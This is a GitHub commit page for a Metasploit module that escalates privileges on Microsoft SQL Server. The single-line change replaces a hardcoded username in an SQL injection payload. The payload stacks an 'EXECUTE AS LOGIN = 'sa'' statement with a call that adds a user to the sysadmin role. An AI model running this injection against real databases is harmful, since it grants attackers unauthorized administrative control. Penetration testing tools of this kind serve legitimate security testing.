Skip to content

Commit 5bebabb

Browse files
nullbindnullbind
committed
fixed hardcoded username
1 parent bb81107 commit 5bebabb

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

modules/auxiliary/admin/mssql/mssql_escalate_execute_as_sqli.rb

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -193,7 +193,7 @@ def check_imp_sysadmin(imp_user_list)
193193
def escalate_privs(imp_user,db_user)
194194

195195
# Setup Query - Impersonate the first sysadmin user on the list
196-
evil_sql = "1;EXECUTE AS LOGIN = 'sa';EXEC sp_addsrvrolemember 'MyUser1','sysadmin';Revert;--"
196+
evil_sql = "1;EXECUTE AS LOGIN = 'sa';EXEC sp_addsrvrolemember '#{db_user}','sysadmin';Revert;--"
197197

198198
# Execute Query
199199
mssql_query(evil_sql)

0 commit comments

Comments
 (0)